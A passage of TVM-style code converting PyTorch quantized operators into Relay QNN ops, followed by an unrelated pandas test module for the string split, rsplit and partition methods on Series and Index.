dilation = inputs[4]
groups = inputs[5]
output_scale = _expr.const(inputs[6])
output_zero_point = _expr.const(inputs[7])
assert len(inputs) == 10, "Input quant params not found in op inputs"
input_scale = _expr.const(inputs[8])
input_zero_point = _expr.const(inputs[9])
weight_shape = infer_shape(weight)
kernel_size = (weight_shape[2], weight_shape[3])
out_channels = weight_shape[0]
if padding[0] != 0 or padding[1] != 0:
pad_val = _get_scalar(input_zero_point)
inp = _op.nn.pad(
inputs[0],
pad_width=((0, 0), (0, 0), (padding[0], padding[0]), (padding[1], padding[1])),
pad_value=float(pad_val),
)
else:
inp = inputs[0]
# padding is (0, 0) because we applied an explicit pad op above,
# with the input zero point as the pad value
conv_out = relay.qnn.op.conv2d(
inp,
weight,
input_zero_point,
weight_zero_point,
input_scale,
weight_scale,
kernel_size=kernel_size,
dilation=dilation,
strides=strides,
padding=(0, 0),
groups=groups,
channels=out_channels,
)
return _do_bias_and_requantize(
conv_out, bias, input_scale, weight_scale, output_scale, output_zero_point, with_relu
)
return _impl
def _linear(with_relu=False):
# similar to conv
def _impl(inputs, _):
weight = inputs[1][0]
weight_scale = inputs[1][1]
weight_zero_point = inputs[1][2]
output_scale = _expr.const(inputs[2])
output_zero_point = _expr.const(inputs[3])
assert len(inputs) == 6, "Input quant params not found in op inputs"
# Manually added by add_input_quant_params_to_op_inputs above
input_scale = _expr.const(inputs[4])
input_zero_point = _expr.const(inputs[5])
weight_shape = infer_shape(weight)
dense = relay.qnn.op.dense(
inputs[0],
weight,
input_zero_point,
weight_zero_point,
input_scale,
weight_scale,
units=weight_shape[0],
)
bias_var = inputs[1][3]
return _do_bias_and_requantize(
dense, bias_var, input_scale, weight_scale, output_scale, output_zero_point, with_relu
)
return _impl
def _binop(relay_op, with_relu=False, fp32_piggy_back=False):
def qnn_impl(
lhs,
rhs,
input_scale_lhs,
input_zero_point_lhs,
input_scale_rhs,
input_zero_point_rhs,
output_scale,
output_zero_point,
):
qnn_out = relay_op(
lhs,
rhs,
input_scale_lhs,
input_zero_point_lhs,
input_scale_rhs,
input_zero_point_rhs,
output_scale,
output_zero_point,
)
if with_relu:
clip_min = _get_scalar(output_zero_point)
return _op.tensor.clip(qnn_out, clip_min, 255)
return qnn_out
# refer to aten/src/ATen/native/quantized/cpu/{qadd, qmul}.cpp
# they piggyback to fp32 math: dequantize -> fp32 math -> quantize
def torch_impl(
lhs,
rhs,
input_scale_lhs,
input_zero_point_lhs,
input_scale_rhs,
input_zero_point_rhs,
output_scale,
output_zero_point,
):
if isinstance(lhs, _expr.Call) and lhs.op.name == "qnn.quantize":
lhs = lhs.args[0]
else:
lhs = relay.qnn.op.dequantize(lhs, input_scale_lhs, input_zero_point_lhs)
if isinstance(rhs, _expr.Call) and rhs.op.name == "qnn.quantize":
rhs = rhs.args[0]
else:
rhs = relay.qnn.op.dequantize(rhs, input_scale_rhs, input_zero_point_rhs)
fp32_out = relay_op(lhs, rhs)
if with_relu:
fp32_out = _op.nn.relu(fp32_out)
return relay.qnn.op.quantize(
fp32_out, output_scale, output_zero_point, axis=-1, out_dtype="uint8"
)
def _impl(inputs, _):
lhs = inputs[0]
rhs = inputs[1]
output_scale = _expr.const(inputs[2])
output_zero_point = _expr.const(inputs[3])
assert len(inputs) == 8, "Input quant params not found in op inputs"
# Manually added by add_input_quant_params_to_op_inputs above
input_scale_lhs = _expr.const(inputs[4])
input_zero_point_lhs = _expr.const(inputs[5])
input_scale_rhs = _expr.const(inputs[6])
input_zero_point_rhs = _expr.const(inputs[7])
if fp32_piggy_back:
logger.info("Piggy backing to FP32 op (PyTorch way)")
return torch_impl(
lhs,
rhs,
input_scale_lhs,
input_zero_point_lhs,
input_scale_rhs,
input_zero_point_rhs,
output_scale,
output_zero_point,
)
return qnn_impl(
lhs,
rhs,
input_scale_lhs,
input_zero_point_lhs,
input_scale_rhs,
input_zero_point_rhs,
output_scale,
output_zero_point,
)
return _impl
def _cat(fp32_piggy_back=False):
# refer to aten/src/ATen/native/quantized/cpu/qconcat.cpp
# for concat they also piggyback to fp32(!):
# dequantize -> fp32 math -> quantize
def torch_impl(inputs, input_scales, input_zero_points, output_scale, output_zero_point, axis):
dequantized = []
for inp, inp_scale, inp_zp in zip(inputs, input_scales, input_zero_points):
dequantized.append(relay.qnn.op.dequantize(inp, inp_scale, inp_zp))
concat = _op.tensor.concatenate(dequantized, axis=axis)
return relay.qnn.op.quantize(
concat, output_scale, output_zero_point, axis=axis, out_dtype="uint8"
)
def _impl(inputs, _):
axis = inputs[1]
output_scale = _expr.const(inputs[2])
output_zero_point = _expr.const(inputs[3])
num_inputs = (len(inputs) - 4) // 2
input_scales = []
input_zero_points = []
for i in range(0, num_inputs):
input_scales.append(_expr.const(inputs[4 + i * 2]))
input_zero_points.append(_expr.const(inputs[4 + i * 2 + 1]))
if fp32_piggy_back:
return torch_impl(
inputs[0], input_scales, input_zero_points, output_scale, output_zero_point, axis
)
return relay.qnn.op.concatenate(
inputs[0], input_scales, input_zero_points, output_scale, output_zero_point, axis
)
return _impl
def _add_scalar():
# this is used for mobilenet v3
def _impl(inputs, _):
# refer to aten/src/ATen/native/quantized/cpu/qadd.cpp
assert len(inputs) == 6, "Input quant params not found in op inputs"
s = inputs[4]
z = inputs[5]
c = inputs[1]
c_q = round(c / s)
q_min = 0
q_max = 255
# math for calculating output scale and zp is already done
# during _add_output_quant_params_to_scalar_op above
out_scale = _expr.const(inputs[2])
out_zp = _expr.const(inputs[3])
if q_min > z - c_q or q_max < z - c_q:
# TODO(masahi): Replace this with integer only compute
dequant = relay.qnn.op.dequantize(inputs[0], _expr.const(s), _expr.const(z))
dequantized_add = _op.tensor.add(dequant, _expr.const(c_q * s))
return relay.qnn.op.quantize(
dequantized_add, out_scale, out_zp, axis=1, out_dtype="uint8"
)
# only scale change
return inputs[0]
return _impl
def quantize_scalar(data, scale, zero_point):
# used to quantize 6.0 in mobilenet v3
transformed = zero_point + data / scale
return max(0, min(round(transformed), 255))
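# For example (sanity check, not part of the original module):
#   quantize_scalar(6.0, 0.1, 0)   -> min(round(0 + 6.0 / 0.1), 255) = 60
#   quantize_scalar(6.0, 0.1, 200) -> 255  (260 is clipped to the uint8 max)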
def _relu6():
# refer to src/ATen/native/quantized/cpu/qrelu.cpp
def _impl(inputs, _):
assert len(inputs) == 4, "Input quant params not found in op inputs"
input_scale = inputs[2]
input_zero_point = inputs[3]
six = quantize_scalar(6.0, input_scale, input_zero_point)
return _op.tensor.clip(inputs[0], input_zero_point, six)
return _impl
def _mul_scalar():
# this is used for mobilenet v3
def _impl(inputs, _):
# refer to aten/src/ATen/native/quantized/cpu/qmul.cpp
# math for calculating output scale and zp is already done
# during _add_output_quant_params_to_scalar_op above
assert len(inputs) == 6, "Input quant params not found in op inputs"
other_val = inputs[1] # scalar
if other_val > 0.0:
# only scale change
return inputs[0]
if other_val == 0.0:
shape = infer_shape(inputs[0])
return _op.full(_expr.const(0), shape, dtype="uint8")
# negative scale case
q_min = 0
q_max = 255
bias = _expr.const(q_max + q_min, dtype="int8")
int8 = bias - _op.cast(inputs[0], "int8")
return _op.cast(int8, "uint8")
return _impl
def _hswish():
# refer to src/ATen/native/quantized/cpu/kernels/QuantizedOpKernels.cpp
# They fall back to fp32
def _impl(inputs, _):
assert len(inputs) == 5, "Input quant params not found in op inputs"
# TODO(masahi): Replace this with integer only compute.
# We do not have to strictly follow how PyTorch does it.
def relu6(x):
return _op.tensor.clip(x, 0.0, 6.0)
def hardsigmoid(x):
dtype = "float32"
return relu6(x + _expr.const(3.0, dtype=dtype)) / _expr.const(6.0, dtype=dtype)
output_scale = _expr.const(inputs[1])
output_zero_point = _expr.const(inputs[2])
input_scale = _expr.const(inputs[3])
input_zero_point = _expr.const(inputs[4])
dequant = relay.qnn.op.dequantize(inputs[0], input_scale, input_zero_point, axis=1)
dequantized_hswish = dequant * hardsigmoid(dequant)
return relay.qnn.op.quantize(
dequantized_hswish, output_scale, output_zero_point, out_dtype="uint8"
)
return _impl
def _linear_dynamic():
def _calculate_qparam(inp):
# reference ATen/native/quantized/cpu/qlinear_dynamic.cpp
# ChooseQuantizationParams function
mn = _op.min(inp)
mx = _op.max(inp)
# Ensure that the interval contains 0
mn = _op.minimum(mn, _op.const(0.0, dtype="float32"))
mx = _op.maximum(mx, _op.const(0.0, dtype="float32"))
qmax = 255
# reduce_range became True in v1.6
if is_version_greater_than("1.5.1"):
qmax = 127
scale = (mx - mn) / _expr.const(qmax, dtype="float32")
zero_point_from_min = -(mn / scale)
zero_point = _op.cast(_op.round(_op.clip(zero_point_from_min, 0.0, qmax)), "int32")
return scale, zero_point
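# Numeric sketch of the qparam choice above (hypothetical values, with
# qmax = 255): for mn = -1.0 and mx = 3.0, scale = 4.0 / 255 ~= 0.0157 and
# zero_point = round(clip(1.0 / 0.0157, 0, 255)) = 64, so the interval
# [-1, 3] maps onto the uint8 range with 0.0 exactly representable.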
def _impl(inputs, _):
weight = inputs[1][0]
weight_scale = inputs[1][1]
weight_zero_point = inputs[1][2]
inp = inputs[0]
input_scale, input_zero_point = _calculate_qparam(inp)
qinp = relay.qnn.op.quantize(inp, input_scale, input_zero_point, out_dtype="uint8")
data_shape = infer_shape(inp)
if len(data_shape) > 2:
qinp = _op.reverse_reshape(qinp, [-1, 0])
weight_shape = infer_shape(weight)
units = weight_shape[0]
dense = relay.qnn.op.dense(
qinp,
weight,
input_zero_point,
weight_zero_point,
input_scale,
weight_scale,
units=units,
)
bias_var = inputs[1][3]
dequant_scale = input_scale * weight_scale
dense_out = relay.qnn.op.dequantize(
dense, dequant_scale, input_zero_point=relay.const(0, "int32"), axis=1
)
if len(data_shape) > 2:
new_shape = list(data_shape[:-1])
new_shape.append(units)
dense_out = _op.reshape(dense_out, new_shape)
if bias_var is not None:
return dense_out + bias_var
return dense_out
return _impl
def _quantized_conv_transpose2d(with_relu=False):
def _impl(inputs, _):
# Refer to aten/src/ATen/native/quantized/cpu/qconv.cpp
# Supported in Torch 1.7 or newer
conv_params = inputs[1]
weight = conv_params[0]
weight_scale = conv_params[1]
weight_zero_point = conv_params[2]
bias = conv_params[3]
strides = conv_params[4]
padding = conv_params[5]
dilation = conv_params[6]
groups = conv_params[7]
output_padding = conv_params[8]
output_scale = _expr.const(inputs[2])
output_zero_point = _expr.const(inputs[3])
assert len(inputs) == 6, "Input quant params not found in op inputs"
# These are manually added by add_input_quant_params_to_op_inputs above
# In torch, they are retrieved from QTensor data structure at runtime
input_scale = _expr.const(inputs[4])
input_zero_point = _expr.const(inputs[5])
weight_shape = list(infer_shape(weight))
kernel_size = (weight_shape[2], weight_shape[3])
out_channels = weight_shape[1]
conv_out = relay.qnn.op.conv2d_transpose(
inputs[0],
weight,
input_zero_point,
weight_zero_point,
input_scale,
weight_scale,
kernel_size=kernel_size,
dilation=dilation,
strides=strides,
padding=padding,
groups=groups,
channels=out_channels,
output_padding=output_padding,
out_dtype="int32",
kernel_layout="IOHW",
)
return _do_bias_and_requantize(
conv_out, bias, input_scale, weight_scale, output_scale, output_zero_point, with_relu
)
return _impl
convert_map = {
"aten::quantize_per_tensor": _quantize_per_tensor(),
"quantized::conv2d_relu": _quantized_conv2d(with_relu=True),
"aten::dequantize": _dequantize(),
"quantized::conv2d": _quantized_conv2d(),
"quantized::add_relu": _binop(relay.qnn.op.add, with_relu=True),
"quantized::add": _binop(relay.qnn.op.add),
"quantized::mul_relu": _binop(relay.qnn.op.mul, with_relu=True),
"quantized::mul": _binop(relay.qnn.op.mul),
"quantized::linear": _linear(),
"quantized::linear_relu": _linear(with_relu=True),
"quantized::cat": _cat(),
"quantized::add_scalar": _add_scalar(),
"quantized::mul_scalar": _mul_scalar(),
"quantized::relu6": _relu6(),
"quantized::linear_dynamic": _linear_dynamic(),
"quantized::hardswish": _hswish(),
"quantized::conv_transpose2d": _quantized_conv_transpose2d(),
}
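# Sketch of how this table is consumed (hypothetical driver code; the real
# frontend wires the dispatch up elsewhere):
#   impl = convert_map[node.kind()]          # e.g. "quantized::conv2d"
#   relay_out = impl(relay_inputs, input_types)
# Each impl takes the op's relay inputs plus a second argument (the input
# types list, unused as "_" in the impls above).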
|
|
from datetime import datetime
import re
import numpy as np
import pytest
import pandas as pd
from pandas import (
DataFrame,
Index,
MultiIndex,
Series,
_testing as tm,
)
@pytest.mark.parametrize("method", ["split", "rsplit"])
def test_split(any_string_dtype, method):
values = Series(["a_b_c", "c_d_e", np.nan, "f_g_h"], dtype=any_string_dtype)
result = getattr(values.str, method)("_")
exp = Series([["a", "b", "c"], ["c", "d", "e"], np.nan, ["f", "g", "h"]])
tm.assert_series_equal(result, exp)
@pytest.mark.parametrize("method", ["split", "rsplit"])
def test_split_more_than_one_char(any_string_dtype, method):
# more than one char
values = Series(["a__b__c", "c__d__e", np.nan, "f__g__h"], dtype=any_string_dtype)
result = getattr(values.str, method)("__")
exp = Series([["a", "b", "c"], ["c", "d", "e"], np.nan, ["f", "g", "h"]])
tm.assert_series_equal(result, exp)
result = getattr(values.str, method)("__", expand=False)
tm.assert_series_equal(result, exp)
def test_split_more_regex_split(any_string_dtype):
# regex split
values = Series(["a,b_c", "c_d,e", np.nan, "f,g,h"], dtype=any_string_dtype)
result = values.str.split("[,_]")
exp = Series([["a", "b", "c"], ["c", "d", "e"], np.nan, ["f", "g", "h"]])
tm.assert_series_equal(result, exp)
def test_split_regex(any_string_dtype):
# GH 43563
# explicit regex = True split
values = Series("xxxjpgzzz.jpg", dtype=any_string_dtype)
result = values.str.split(r"\.jpg", regex=True)
exp = Series([["xxxjpgzzz", ""]])
tm.assert_series_equal(result, exp)
def test_split_regex_explicit(any_string_dtype):
# explicit regex = True split with compiled regex
regex_pat = re.compile(r".jpg")
values = Series("xxxjpgzzz.jpg", dtype=any_string_dtype)
result = values.str.split(regex_pat)
exp = Series([["xx", "zzz", ""]])
tm.assert_series_equal(result, exp)
# explicit regex = False split
result = values.str.split(r"\.jpg", regex=False)
exp = Series([["xxxjpgzzz.jpg"]])
tm.assert_series_equal(result, exp)
# non-explicit regex split, pattern length == 1
result = values.str.split(r".")
exp = Series([["xxxjpgzzz", "jpg"]])
tm.assert_series_equal(result, exp)
# non-explicit regex split, pattern length != 1
result = values.str.split(r".jpg")
exp = Series([["xx", "zzz", ""]])
tm.assert_series_equal(result, exp)
# regex=False with pattern compiled regex raises error
with pytest.raises(
ValueError,
match="Cannot use a compiled regex as replacement pattern with regex=False",
):
values.str.split(regex_pat, regex=False)
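# Summary of the dispatch rules exercised above (as observed in these tests,
# not an exhaustive statement of the API): a one-character pattern splits
# literally, a longer pattern is treated as a regex unless regex=False, and
# regex=True (or a compiled pattern) forces regex semantics. For example:
#   Series(["a.b"]).str.split(".")    # length 1 -> literal -> [["a", "b"]]
#   Series(["axb"]).str.split(".b")   # length 2 -> regex   -> [["a", ""]]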
@pytest.mark.parametrize("expand", [None, False])
@pytest.mark.parametrize("method", ["split", "rsplit"])
def test_split_object_mixed(expand, method):
mixed = Series(["a_b_c", np.nan, "d_e_f", True, datetime.today(), None, 1, 2.0])
result = getattr(mixed.str, method)("_", expand=expand)
exp = Series(
[
["a", "b", "c"],
np.nan,
["d", "e", "f"],
np.nan,
np.nan,
np.nan,
np.nan,
np.nan,
]
)
assert isinstance(result, Series)
tm.assert_almost_equal(result, exp)
@pytest.mark.parametrize("method", ["split", "rsplit"])
@pytest.mark.parametrize("n", [None, 0])
def test_split_n(any_string_dtype, method, n):
s = Series(["a b", pd.NA, "b c"], dtype=any_string_dtype)
expected = Series([["a", "b"], pd.NA, ["b", "c"]])
result = getattr(s.str, method)(" ", n=n)
tm.assert_series_equal(result, expected)
def test_rsplit(any_string_dtype):
# regex split is not supported by rsplit
values = Series(["a,b_c", "c_d,e", np.nan, "f,g,h"], dtype=any_string_dtype)
result = values.str.rsplit("[,_]")
exp = Series([["a,b_c"], ["c_d,e"], np.nan, ["f,g,h"]])
tm.assert_series_equal(result, exp)
def test_rsplit_max_number(any_string_dtype):
# when setting a max number of splits, make sure it is applied from the end
values = Series(["a_b_c", "c_d_e", np.nan, "f_g_h"], dtype=any_string_dtype)
result = values.str.rsplit("_", n=1)
exp = Series([["a_b", "c"], ["c_d", "e"], np.nan, ["f_g", "h"]])
tm.assert_series_equal(result, exp)
def test_split_blank_string(any_string_dtype):
# expand blank split GH 20067
values = Series([""], name="test", dtype=any_string_dtype)
result = values.str.split(expand=True)
exp = DataFrame([[]], dtype=any_string_dtype) # NOTE: this is NOT an empty df
tm.assert_frame_equal(result, exp)
def test_split_blank_string_with_non_empty(any_string_dtype):
values = Series(["a b c", "a b", "", " "], name="test", dtype=any_string_dtype)
result = values.str.split(expand=True)
exp = DataFrame(
[
["a", "b", "c"],
["a", "b", np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
],
dtype=any_string_dtype,
)
tm.assert_frame_equal(result, exp)
@pytest.mark.parametrize("method", ["split", "rsplit"])
def test_split_noargs(any_string_dtype, method):
# #1859
s = Series(["Wes McKinney", "Travis Oliphant"], dtype=any_string_dtype)
result = getattr(s.str, method)()
expected = ["Travis", "Oliphant"]
assert result[1] == expected
@pytest.mark.parametrize(
"data, pat",
[
(["bd asdf jfg", "kjasdflqw asdfnfk"], None),
(["bd asdf jfg", "kjasdflqw asdfnfk"], "asdf"),
(["bd_asdf_jfg", "kjasdflqw_asdfnfk"], "_"),
],
)
@pytest.mark.parametrize("n", [-1, 0])
def test_split_maxsplit(data, pat, any_string_dtype, n):
# n=0 and n=-1 both mean "no limit": re.split uses 0, str.split uses -1
s = Series(data, dtype=any_string_dtype)
result = s.str.split(pat=pat, n=n)
xp = s.str.split(pat=pat)
tm.assert_series_equal(result, xp)
@pytest.mark.parametrize(
"data, pat, expected",
[
(
["split once", "split once too!"],
None,
Series({0: ["split", "once"], 1: ["split", "once too!"]}),
),
(
["split_once", "split_once_too!"],
"_",
Series({0: ["split", "once"], 1: ["split", "once_too!"]}),
),
],
)
def test_split_no_pat_with_nonzero_n(data, pat, expected, any_string_dtype):
s = Series(data, dtype=any_string_dtype)
result = s.str.split(pat=pat, n=1)
tm.assert_series_equal(expected, result, check_index_type=False)
def test_split_to_dataframe_no_splits(any_string_dtype):
s = Series(["nosplit", "alsonosplit"], dtype=any_string_dtype)
result = s.str.split("_", expand=True)
exp = DataFrame({0: Series(["nosplit", "alsonosplit"], dtype=any_string_dtype)})
tm.assert_frame_equal(result, exp)
def test_split_to_dataframe(any_string_dtype):
s = Series(["some_equal_splits", "with_no_nans"], dtype=any_string_dtype)
result = s.str.split("_", expand=True)
exp = DataFrame(
{0: ["some", "with"], 1: ["equal", "no"], 2: ["splits", "nans"]},
dtype=any_string_dtype,
)
tm.assert_frame_equal(result, exp)
def test_split_to_dataframe_unequal_splits(any_string_dtype):
s = Series(
["some_unequal_splits", "one_of_these_things_is_not"], dtype=any_string_dtype
)
result = s.str.split("_", expand=True)
exp = DataFrame(
{
0: ["some", "one"],
1: ["unequal", "of"],
2: ["splits", "these"],
3: [np.nan, "things"],
4: [np.nan, "is"],
5: [np.nan, "not"],
},
dtype=any_string_dtype,
)
tm.assert_frame_equal(result, exp)
def test_split_to_dataframe_with_index(any_string_dtype):
s = Series(
["some_splits", "with_index"], index=["preserve", "me"], dtype=any_string_dtype
)
result = s.str.split("_", expand=True)
exp = DataFrame(
{0: ["some", "with"], 1: ["splits", "index"]},
index=["preserve", "me"],
dtype=any_string_dtype,
)
tm.assert_frame_equal(result, exp)
with pytest.raises(ValueError, match="expand must be"):
s.str.split("_", expand="not_a_boolean")
def test_split_to_multiindex_expand_no_splits():
# https://github.com/pandas-dev/pandas/issues/23677
idx = Index(["nosplit", "alsonosplit", np.nan])
result = idx.str.split("_", expand=True)
exp = idx
tm.assert_index_equal(result, exp)
assert result.nlevels == 1
def test_split_to_multiindex_expand():
idx = Index(["some_equal_splits", "with_no_nans", np.nan, None])
result = idx.str.split("_", expand=True)
exp = MultiIndex.from_tuples(
[
("some", "equal", "splits"),
("with", "no", "nans"),
[np.nan, np.nan, np.nan],
[None, None, None],
]
)
tm.assert_index_equal(result, exp)
assert result.nlevels == 3
def test_split_to_multiindex_expand_unequal_splits():
idx = Index(["some_unequal_splits", "one_of_these_things_is_not", np.nan, None])
result = idx.str.split("_", expand=True)
exp = MultiIndex.from_tuples(
[
("some", "unequal", "splits", np.nan, np.nan, np.nan),
("one", "of", "these", "things", "is", "not"),
(np.nan, np.nan, np.nan, np.nan, np.nan, np.nan),
(None, None, None, None, None, None),
]
)
tm.assert_index_equal(result, exp)
assert result.nlevels == 6
with pytest.raises(ValueError, match="expand must be"):
idx.str.split("_", expand="not_a_boolean")
def test_rsplit_to_dataframe_expand_no_splits(any_string_dtype):
s = Series(["nosplit", "alsonosplit"], dtype=any_string_dtype)
result = s.str.rsplit("_", expand=True)
exp = DataFrame({0: Series(["nosplit", "alsonosplit"])}, dtype=any_string_dtype)
tm.assert_frame_equal(result, exp)
def test_rsplit_to_dataframe_expand(any_string_dtype):
s = Series(["some_equal_splits", "with_no_nans"], dtype=any_string_dtype)
result = s.str.rsplit("_", expand=True)
exp = DataFrame(
{0: ["some", "with"], 1: ["equal", "no"], 2: ["splits", "nans"]},
dtype=any_string_dtype,
)
tm.assert_frame_equal(result, exp)
result = s.str.rsplit("_", expand=True, n=2)
exp = DataFrame(
{0: ["some", "with"], 1: ["equal", "no"], 2: ["splits", "nans"]},
dtype=any_string_dtype,
)
tm.assert_frame_equal(result, exp)
result = s.str.rsplit("_", expand=True, n=1)
exp = DataFrame(
{0: ["some_equal", "with_no"], 1: ["splits", "nans"]}, dtype=any_string_dtype
)
tm.assert_frame_equal(result, exp)
def test_rsplit_to_dataframe_expand_with_index(any_string_dtype):
s = Series(
["some_splits", "with_index"], index=["preserve", "me"], dtype=any_string_dtype
)
result = s.str.rsplit("_", expand=True)
exp = DataFrame(
{0: ["some", "with"], 1: ["splits", "index"]},
index=["preserve", "me"],
dtype=any_string_dtype,
)
tm.assert_frame_equal(result, exp)
def test_rsplit_to_multiindex_expand_no_split():
idx = Index(["nosplit", "alsonosplit"])
result = idx.str.rsplit("_", expand=True)
exp = idx
tm.assert_index_equal(result, exp)
assert result.nlevels == 1
def test_rsplit_to_multiindex_expand():
idx = Index(["some_equal_splits", "with_no_nans"])
result = idx.str.rsplit("_", expand=True)
exp = MultiIndex.from_tuples([("some", "equal", "splits"), ("with", "no", "nans")])
tm.assert_index_equal(result, exp)
assert result.nlevels == 3
def test_rsplit_to_multiindex_expand_n():
idx = Index(["some_equal_splits", "with_no_nans"])
result = idx.str.rsplit("_", expand=True, n=1)
exp = MultiIndex.from_tuples([("some_equal", "splits"), ("with_no", "nans")])
tm.assert_index_equal(result, exp)
assert result.nlevels == 2
def test_split_nan_expand(any_string_dtype):
# gh-18450
s = Series(["foo,bar,baz", np.nan], dtype=any_string_dtype)
result = s.str.split(",", expand=True)
exp = DataFrame(
[["foo", "bar", "baz"], [np.nan, np.nan, np.nan]], dtype=any_string_dtype
)
tm.assert_frame_equal(result, exp)
# check that these are actually np.nan/pd.NA and not None
# TODO see GH 18463
# tm.assert_frame_equal does not differentiate
if any_string_dtype == "object":
assert all(np.isnan(x) for x in result.iloc[1])
else:
assert all(x is pd.NA for x in result.iloc[1])
def test_split_with_name_series(any_string_dtype):
# GH 12617
# should preserve name
s = Series(["a,b", "c,d"], name="xxx", dtype=any_string_dtype)
res = s.str.split(",")
exp = Series([["a", "b"], ["c", "d"]], name="xxx")
tm.assert_series_equal(res, exp)
res = s.str.split(",", expand=True)
exp = DataFrame([["a", "b"], ["c", "d"]], dtype=any_string_dtype)
tm.assert_frame_equal(res, exp)
def test_split_with_name_index():
# GH 12617
idx = Index(["a,b", "c,d"], name="xxx")
res = idx.str.split(",")
exp = Index([["a", "b"], ["c", "d"]], name="xxx")
assert res.nlevels == 1
tm.assert_index_equal(res, exp)
res = idx.str.split(",", expand=True)
exp = MultiIndex.from_tuples([("a", "b"), ("c", "d")])
assert res.nlevels == 2
tm.assert_index_equal(res, exp)
@pytest.mark.parametrize(
"method, exp",
[
[
"partition",
[
("a", "__", "b__c"),
("c", "__", "d__e"),
np.nan,
("f", "__", "g__h"),
None,
],
],
[
"rpartition",
[
("a__b", "__", "c"),
("c__d", "__", "e"),
np.nan,
("f__g", "__", "h"),
None,
],
],
],
)
def test_partition_series_more_than_one_char(method, exp, any_string_dtype):
# https://github.com/pandas-dev/pandas/issues/23558
# more than one char
s = Series(["a__b__c", "c__d__e", np.nan, "f__g__h", None], dtype=any_string_dtype)
result = getattr(s.str, method)("__", expand=False)
expected = Series(exp)
tm.assert_series_equal(result, expected)
@pytest.mark.parametrize(
"method, exp",
[
[
"partition",
[("a", " ", "b c"), ("c", " ", "d e"), np.nan, ("f", " ", "g h"), None],
],
[
"rpartition",
[("a b", " ", "c"), ("c d", " ", "e"), np.nan, ("f g", " ", "h"), None],
],
],
)
def test_partition_series_none(any_string_dtype, method, exp):
# https://github.com/pandas-dev/pandas/issues/23558
# None
s = Series(["a b c", "c d e", np.nan, "f g h", None], dtype=any_string_dtype)
result = getattr(s.str, method)(expand=False)
expected = Series(exp)
tm.assert_series_equal(result, expected)
@pytest.mark.parametrize(
"method, exp",
[
[
"partition",
[("abc", "", ""), ("cde", "", ""), np.nan, ("fgh", "", ""), None],
],
[
"rpartition",
[("", "", "abc"), ("", "", "cde"), np.nan, ("", "", "fgh"), None],
],
],
)
def test_partition_series_not_split(any_string_dtype, method, exp):
# https://github.com/pandas-dev/pandas/issues/23558
# Not split
s = Series(["abc", "cde", np.nan, "fgh", None], dtype=any_string_dtype)
result = getattr(s.str, method)("_", expand=False)
expected = Series(exp)
tm.assert_series_equal(result, expected)
@pytest.mark.parametrize(
"method, exp",
[
[
"partition",
[("a", "_", "b_c"), ("c", "_", "d_e"), np.nan, ("f", "_", "g_h")],
],
[
"rpartition",
[("a_b", "_", "c"), ("c_d", "_", "e"), np.nan, ("f_g", "_", "h")],
],
],
)
def test_partition_series_unicode(any_string_dtype, method, exp):
# https://github.com/pandas-dev/pandas/issues/23558
# unicode
s = Series(["a_b_c", "c_d_e", np.nan, "f_g_h"], dtype=any_string_dtype)
result = getattr(s.str, method)("_", expand=False)
expected = Series(exp)
tm.assert_series_equal(result, expected)
@pytest.mark.parametrize("method", ["partition", "rpartition"])
def test_partition_series_stdlib(any_string_dtype, method):
# https://github.com/pandas-dev/pandas/issues/23558
# compare to standard lib
s = Series(["A_B_C", "B_C_D", "E_F_G", "EFGHEF"], dtype=any_string_dtype)
result = getattr(s.str, method)("_", expand=False).tolist()
assert result == [getattr(v, method)("_") for v in s]
@pytest.mark.parametrize(
"method, expand, exp, exp_levels",
[
[
"partition",
False,
np.array(
[("a", "_", "b_c"), ("c", "_", "d_e"), ("f", "_", "g_h"), np.nan, None],
dtype=object,
),
1,
],
[
"rpartition",
False,
np.array(
[("a_b", "_", "c"), ("c_d", "_", "e"), ("f_g", "_", "h"), np.nan, None],
dtype=object,
),
1,
],
],
)
def test_partition_index(method, expand, exp, exp_levels):
# https://github.com/pandas-dev/pandas/issues/23558
values = Index(["a_b_c", "c_d_e", "f_g_h", np.nan, None])
result = getattr(values.str, method)("_", expand=expand)
exp = Index(exp)
tm.assert_index_equal(result, exp)
assert result.nlevels == exp_levels
@pytest.mark.parametrize(
"method, exp",
[
[
"partition",
{
0: ["a", "c", np.nan, "f", None],
1: ["_", "_", np.nan, "_", None],
2: ["b_c", "d_e", np.nan, "g_h", None],
},
],
[
"rpartition",
{
0: ["a_b", "c_d", np.nan, "f_g", None],
1: ["_", "_", np.nan, "_", None],
2: ["c", "e", np.nan, "h", None],
},
],
],
)
def test_partition_to_dataframe(any_string_dtype, method, exp):
# https://github.com/pandas-dev/pandas/issues/23558
s = Series(["a_b_c", "c_d_e", np.nan, "f_g_h", None], dtype=any_string_dtype)
result = getattr(s.str, method)("_")
expected = DataFrame(
exp,
dtype=any_string_dtype,
)
tm.assert_frame_equal(result, expected)
@pytest.mark.parametrize(
"method, exp",
[
[
"partition",
{
0: ["a", "c", np.nan, "f", None],
1: ["_", "_", np.nan, "_", None],
2: ["b_c", "d_e", np.nan, "g_h", None],
},
],
[
"rpartition",
{
0: ["a_b", "c_d", np.nan, "f_g", None],
1: ["_", "_", np.nan, "_", None],
2: ["c", "e", np.nan, "h", None],
},
],
],
)
def test_partition_to_dataframe_from_series(any_string_dtype, method, exp):
# https://github.com/pandas-dev/pandas/issues/23558
s = Series(["a_b_c", "c_d_e", np.nan, "f_g_h", None], dtype=any_string_dtype)
result = getattr(s.str, method)("_", expand=True)
expected = DataFrame(
exp,
dtype=any_string_dtype,
)
tm.assert_frame_equal(result, expected)
def test_partition_with_name(any_string_dtype):
# GH 12617
s = Series(["a,b", "c,d"], name="xxx", dtype=any_string_dtype)
result = s.str.partition(",")
expected = DataFrame(
{0: ["a", "c"], 1: [",", ","], 2: ["b", "d"]}, dtype=any_string_dtype
)
tm.assert_frame_equal(result, expected)
def test_partition_with_name_expand(any_string_dtype):
# GH 12617
# should preserve name
s = Series(["a,b", "c,d"], name="xxx", dtype=any_string_dtype)
result = s.str.partition(",", expand=False)
expected = Series([("a", ",", "b"), ("c", ",", "d")], name="xxx")
tm.assert_series_equal(result, expected)
def test_partition_index_with_name():
idx = Index(["a,b", "c,d"], name="xxx")
result = idx.str.partition(",")
expected = MultiIndex.from_tuples([("a", ",", "b"), ("c", ",", "d")])
assert result.nlevels == 3
tm.assert_index_equal(result, expected)
def test_partition_index_with_name_expand_false():
idx = Index(["a,b", "c,d"], name="xxx")
# should preserve name
result = idx.str.partition(",", expand=False)
expected = Index(np.array([("a", ",", "b"), ("c", ",", "d")]), name="xxx")
assert result.nlevels == 1
